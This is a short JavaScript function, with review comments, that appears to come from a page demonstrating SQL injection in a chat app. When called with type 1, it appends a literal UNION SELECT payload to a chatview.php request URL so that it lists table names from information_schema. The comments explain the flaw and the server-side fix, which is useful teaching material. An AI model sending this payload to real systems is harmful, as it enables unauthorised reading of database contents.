/**
 * Fetch chat data over XMLHttpRequest.
 *
 * This is the page's SQL-injection demonstration: in the type == 1 branch the
 * value of `ni` is followed by a literal UNION SELECT that reads `table_name`
 * from `information_schema.tables`, and the trailing `--` is a SQL comment
 * marker.
 *
 * NOTE(review): chatview.php is not shown here. The request only has this
 * effect if the server concatenates the `ni` parameter into its SQL statement;
 * binding `ni` as a parameter (or rejecting anything that is not an integer)
 * on the server side removes the issue - confirm against the PHP source.
 *
 * @param {*} type 0 requests chatlog.php (handler: getni); 1 requests
 *     chatview.php (handler: chatprint). Compared with loose equality (==).
 *     For any other value open() is never called before send().
 */
function getchatlog(type) {
    // Assigned without var/let, as in the original, so it lands on the global
    // object. The getni / chatprint callbacks are defined elsewhere and
    // presumably read this same global - TODO confirm.
    xmlhttp = new XMLHttpRequest();

    var wantsLog = (type == 0);
    var wantsView = !wantsLog && (type == 1);

    if (wantsLog) {
        xmlhttp.onreadystatechange = getni;
        xmlhttp.open("GET", "chatlog.php?t=1");
    }

    if (wantsView) {
        xmlhttp.onreadystatechange = chatprint;
        // Everything after `ni` is the injected text from the page, kept verbatim.
        var viewUrl = "chatview.php?t=1&ni=" + ni +
            " union select 1,table_name,3,4,5 from information_schema.tables--";
        xmlhttp.open("GET", viewUrl);
    }

    xmlhttp.send(null);
}

// Page caption (the original is mis-encoded Korean; translation reconstructed
// from the damaged bytes, one syllable of the first sentence is unrecoverable):
// "It was a simple SQL Injection. And when asked what could be done to reduce
// the traffic .."